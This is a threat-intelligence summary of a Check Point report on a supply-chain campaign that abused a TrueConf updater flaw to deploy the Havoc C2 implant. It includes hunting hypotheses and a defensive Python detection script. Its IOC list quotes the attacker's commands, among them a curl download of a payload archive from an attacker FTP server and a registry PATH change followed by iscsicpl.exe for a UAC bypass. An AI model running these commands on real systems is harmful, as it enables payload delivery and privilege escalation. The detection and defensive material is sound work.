
Operation TrueChaos: 0-Day Exploitation Against Southeast Asian Government Targets

Check Point Research discovered a zero-day vulnerability (CVE-2026-3502) in the TrueConf client update mechanism, exploited in 'Operation TrueChaos' against Southeast Asian governments. Attackers compromised on-premises TrueConf servers to distribute malicious updates, utilizing DLL sideloading and UAC bypass techniques to deploy the Havoc C2 framework.

Sensitivity: Immediate · Confidence: high · Analyzed: 2026-03-31

Authors: Check Point Research

Actors: Operation TrueChaos · Chinese-nexus threat actor · Amaranth Dragon · ShadowPad

Source: Check Point

IOCs · 3

Key Takeaways

  • A zero-day vulnerability (CVE-2026-3502) in the TrueConf client update mechanism was exploited in the wild.
  • Attackers compromised on-premises TrueConf servers to distribute malicious updates to connected government clients.
  • The campaign, dubbed 'Operation TrueChaos', targeted Southeast Asian government entities.
  • The infection chain utilizes DLL sideloading (via poweriso.exe) and UAC bypass (via iscsicpl.exe) to deploy the Havoc C2 framework.
  • Attribution points to a Chinese-nexus threat actor with moderate confidence, potentially overlapping with ShadowPad operators.

Affected Systems

  • TrueConf Windows client versions prior to 8.5.3
  • Windows OS

Vulnerabilities (CVEs)

  • CVE-2026-3502 (CVSS 7.8) - TrueConf updater validation mechanism flaw

Attack Chain

The attacker compromises an on-premises TrueConf server and replaces the legitimate update package with a malicious Inno Setup installer. When clients update, the installer drops a benign poweriso.exe and a malicious 7z-x64.dll, executing the DLL via sideloading. The attacker then performs reconnaissance, downloads an additional archive via FTP, and modifies the user's PATH variable to execute iscsicpl.exe for a UAC bypass via DLL search-order hijacking with iscsiexe.dll. Finally, the loader maintains persistence for the Havoc C2 implant.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article provides behavioral hunting recommendations and IOCs but does not include ready-to-use detection rules.

Detection Engineering Assessment

  • EDR Visibility: High. The attack relies heavily on process creation (cmd.exe, curl, winrar), DLL sideloading, and registry modifications (Run keys, Environment PATH), all of which are highly visible in EDR telemetry.
  • Network Visibility: Medium. C2 traffic to Havoc servers and FTP downloads are visible, but the initial distribution happens over the trusted internal TrueConf update channel.
  • Detection Difficulty: Moderate. While the initial vector blends in with legitimate updates, the post-exploitation activity (DLL sideloading, UAC bypass via iscsicpl.exe, and suspicious child processes) provides strong behavioral signals.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon 1)
  • Registry Events (Sysmon 12, 13, 14)
  • File Creation (Sysmon 11)
  • Network Connections (Sysmon 3)

Hunting Hypotheses

Hypothesis | Telemetry | ATT&CK Stage | FP Risk
Look for trueconf_windows_update.tmp spawning suspicious child processes or dropping known sideloading binaries like poweriso.exe. | Process Creation, File Creation | Execution | Low
Identify instances of poweriso.exe spawning cmd.exe with network or archiving tools like curl, winrar, or netstat. | Process Creation | Discovery | Low
Monitor for modifications to the HKCU\Environment PATH variable followed by the execution of iscsicpl.exe. | Registry Modification, Process Creation | Privilege Escalation | Low
Hunt for unsigned trueconf_windows_update.exe binaries executing in the environment. | Process Creation, File Creation | Execution | Low

Control Gaps

  • Lack of integrity and authenticity checks in TrueConf's update mechanism.

Key Behavioral Indicators

  • Unsigned trueconf_windows_update.exe
  • poweriso.exe in C:\ProgramData\PowerISO\
  • iscsicpl.exe execution after PATH modification
  • Suspicious parent-child process chain: trueconf.exe -> trueconf_windows_update.exe -> trueconf_windows_update.tmp
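The four hunting hypotheses and the behavioral indicators above, expressed as checks over Sysmon-style telemetry. This is an added example, not code from the Check Point report or from TrueConf; the event field names (id, pid, ppid, image, target, signed), the ten-minute correlation window, the sample SID and the sample events are all assumptions constructed for the example. Sysmon IDs follow the log sources listed above: 1 for process creation, 11 for file creation, 13 for a registry value being set.

```python
# Added example, not from the Check Point report: the hunting hypotheses and behavioral
# indicators above as checks over constructed Sysmon-style events. Field names, the
# correlation window and the sample telemetry are assumptions made for this example.
import json
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

SIDELOAD_HOSTS = {"poweriso.exe"}  # benign binary abused for DLL sideloading in the campaign
RECON_TOOLS = {"curl.exe", "winrar.exe", "netstat.exe", "tasklist.exe", "tracert.exe", "reg.exe"}
# expected ancestry (nearest first) of anything the updater's Inno Setup stage starts
UPDATE_CHAIN = ["trueconf_windows_update.tmp", "trueconf_windows_update.exe", "trueconf.exe"]

# Constructed sample telemetry for one host: id 1 = process create, 11 = file create,
# 13 = registry value set. A benign iscsicpl.exe launch is included as a negative case.
EVENTS = [
    {"ts": "2026-03-20T08:00:00", "id": 1, "pid": 50, "ppid": 1, "image": r"C:\Windows\explorer.exe", "signed": True},
    {"ts": "2026-03-20T08:05:00", "id": 1, "pid": 950, "ppid": 50, "image": r"C:\Windows\SysWOW64\iscsicpl.exe", "signed": True},
    {"ts": "2026-03-20T09:00:00", "id": 1, "pid": 100, "ppid": 50, "image": r"C:\Program Files\TrueConf\trueconf.exe", "signed": True},
    {"ts": "2026-03-20T09:00:05", "id": 1, "pid": 200, "ppid": 100, "image": r"C:\Users\u\AppData\Local\Temp\trueconf_windows_update.exe", "signed": False},
    {"ts": "2026-03-20T09:00:07", "id": 1, "pid": 300, "ppid": 200, "image": r"C:\Users\u\AppData\Local\Temp\trueconf_windows_update.tmp", "signed": False},
    {"ts": "2026-03-20T09:00:09", "id": 11, "pid": 300, "target": r"C:\ProgramData\PowerISO\poweriso.exe"},
    {"ts": "2026-03-20T09:00:10", "id": 1, "pid": 400, "ppid": 300, "image": r"C:\ProgramData\PowerISO\poweriso.exe", "signed": True},
    {"ts": "2026-03-20T09:00:12", "id": 1, "pid": 500, "ppid": 400, "image": r"C:\Windows\System32\cmd.exe", "signed": True},
    {"ts": "2026-03-20T09:01:00", "id": 1, "pid": 600, "ppid": 500, "image": r"C:\Windows\System32\curl.exe", "signed": True},
    {"ts": "2026-03-20T09:01:30", "id": 1, "pid": 700, "ppid": 500, "image": r"C:\Program Files\WinRAR\winrar.exe", "signed": True},
    {"ts": "2026-03-20T09:02:00", "id": 1, "pid": 750, "ppid": 500, "image": r"C:\Windows\System32\reg.exe", "signed": True},
    # Sysmon records HKCU as HKU\<SID>; the SID below is a constructed placeholder
    {"ts": "2026-03-20T09:02:01", "id": 13, "pid": 750, "target": r"HKU\S-1-5-21-0-0-0-1001\Environment\Path"},
    {"ts": "2026-03-20T09:02:05", "id": 1, "pid": 800, "ppid": 500, "image": r"C:\Windows\SysWOW64\iscsicpl.exe", "signed": True},
]


def basename(path):
    return PureWindowsPath(path).name.lower()


def parse_ts(event):
    return datetime.fromisoformat(event["ts"])


def process_index(events):
    return {e["pid"]: e for e in events if e["id"] == 1}


def ancestry(pid, procs, max_depth=16):
    """Image basenames from the given process up towards the root, nearest first."""
    chain = []
    while pid in procs and len(chain) < max_depth:
        chain.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain


def unsigned_updater(events):
    """Hypothesis 4: trueconf_windows_update.exe running without a valid signature."""
    return [e["pid"] for e in events
            if e["id"] == 1 and basename(e["image"]) == "trueconf_windows_update.exe" and not e.get("signed")]


def update_tmp_drops_sideload_host(events):
    """Hypothesis 1: the updater's .tmp stage dropping or spawning a known sideload host,
    with the trueconf.exe -> update.exe -> update.tmp chain above it."""
    procs = process_index(events)
    hits = []
    for e in events:
        if e["id"] == 11 and basename(e["target"]) in SIDELOAD_HOSTS \
                and ancestry(e["pid"], procs)[:3] == UPDATE_CHAIN:
            hits.append(("file_create", e["target"]))
        if e["id"] == 1 and basename(e["image"]) in SIDELOAD_HOSTS \
                and ancestry(e["ppid"], procs)[:3] == UPDATE_CHAIN:
            hits.append(("process_create", e["image"]))
    return hits


def recon_under_sideload_host(events):
    """Hypothesis 2: recon, download or archiving tools with poweriso.exe as an ancestor."""
    procs = process_index(events)
    return [basename(e["image"]) for e in events
            if e["id"] == 1 and basename(e["image"]) in RECON_TOOLS
            and SIDELOAD_HOSTS & set(ancestry(e["ppid"], procs))]


def path_edit_then_iscsicpl(events, window=timedelta(minutes=10)):
    """Hypothesis 3: HKCU Environment\\Path rewritten, then iscsicpl.exe started within the window."""
    path_edits = [parse_ts(e) for e in events
                  if e["id"] == 13 and e["target"].lower().endswith(r"\environment\path")]
    hits = []
    for e in events:
        if e["id"] == 1 and basename(e["image"]) == "iscsicpl.exe":
            started = parse_ts(e)
            if any(timedelta(0) <= started - edit <= window for edit in path_edits):
                hits.append(e["pid"])
    return hits


def hunt(events):
    """Run every hypothesis and return only the ones that fired."""
    results = {
        "unsigned_updater": unsigned_updater(events),
        "update_tmp_drops_sideload_host": update_tmp_drops_sideload_host(events),
        "recon_under_sideload_host": recon_under_sideload_host(events),
        "path_edit_then_iscsicpl": path_edit_then_iscsicpl(events),
    }
    return {name: hits for name, hits in results.items() if hits}


if __name__ == "__main__":
    print(json.dumps(hunt(EVENTS), indent=2))
```

The ancestry walk is what keeps the false-positive rate low: curl.exe or reg.exe under cmd.exe is common, but only flagged here when poweriso.exe sits somewhere above it, and an iscsicpl.exe launch only fires when a PATH rewrite preceded it inside the window (the 08:05 launch in the sample data is ignored for exactly that reason). Against real Sysmon data, map the fields to Image, ParentProcessId, TargetObject/TargetFilename and the signature status your EDR records.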

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Update TrueConf Windows client to version 8.5.3 or later.
  • Search endpoints for the presence of poweriso.exe in C:\ProgramData\PowerISO\ and the specified Havoc C2 IPs.

Infrastructure Hardening

  • Implement strict access controls and monitoring on on-premises TrueConf servers.
  • Restrict outbound FTP and unnecessary C2 ports from internal endpoints.

User Protection

  • Deploy EDR rules to detect DLL sideloading and UAC bypass techniques (e.g., iscsicpl.exe abuse).

Security Awareness

  • Educate IT and security teams on the risks of supply chain and internal update mechanism abuse.

MITRE ATT&CK Mapping

  • T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
  • T1574.002 - Hijack Execution Flow: DLL Side-Loading
  • T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking
  • T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
  • T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1059.003 - Command and Scripting Interpreter: Windows Command Shell

Additional IOCs

  • URLs:
    • fxp://47[.]237[.]15[.]197/update[.]7z - FTP URL used to download the secondary payload archive
  • Registry Keys:
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck - Persistence mechanism pointing to C:\ProgramData\PowerISO\PowerISO.exe
    • HKCU\Environment - Registry key modified to alter the PATH variable for UAC bypass
  • File Paths:
    • C:\ProgramData\PowerISO\poweriso.exe - Legitimate binary abused for DLL sideloading
    • C:\ProgramData\PowerISO\7z-x64.dll - Malicious DLL sideloaded by poweriso.exe
    • %AppData%\Roaming\Adobe\update.7z - Downloaded archive containing secondary payloads
    • C:\ProgramData\winexec.exe - Renamed poweriso.exe executed by the loader for persistence
  • Command Lines:
    • Purpose: Reconnaissance of running processes | Tools: tasklist | Stage: Discovery | tasklist > cache
    • Purpose: Network reconnaissance | Tools: tracert | Stage: Discovery | tracert 8.8.8.8 -h 5
    • Purpose: Download secondary payload via FTP | Tools: curl | Stage: Execution | curl -u ftpuser:<redacted> ftp://47.237.15[.]197/update.7z -o
    • Purpose: Extract downloaded archive | Tools: winrar.exe | Stage: Execution | c:\program files\winrar\winrar.exe x update.7z -p
    • Purpose: Modify PATH environment variable for UAC bypass | Tools: reg.exe | Stage: Privilege Escalation | reg add "hkcu\environment" /v path /t REG_SZ /d
    • Purpose: Execute UAC bypass via DLL search-order hijacking | Tools: cmd.exe, iscsicpl.exe | Stage: Privilege Escalation | c:\windows\system32\cmd.exe c:\windows\syswow64\iscsicpl.exe
  • Other:
    • rom.dat - Encrypted 7z archive of unknown purpose
    • 7za.exe - Legitimate archiving tool dropped during the attack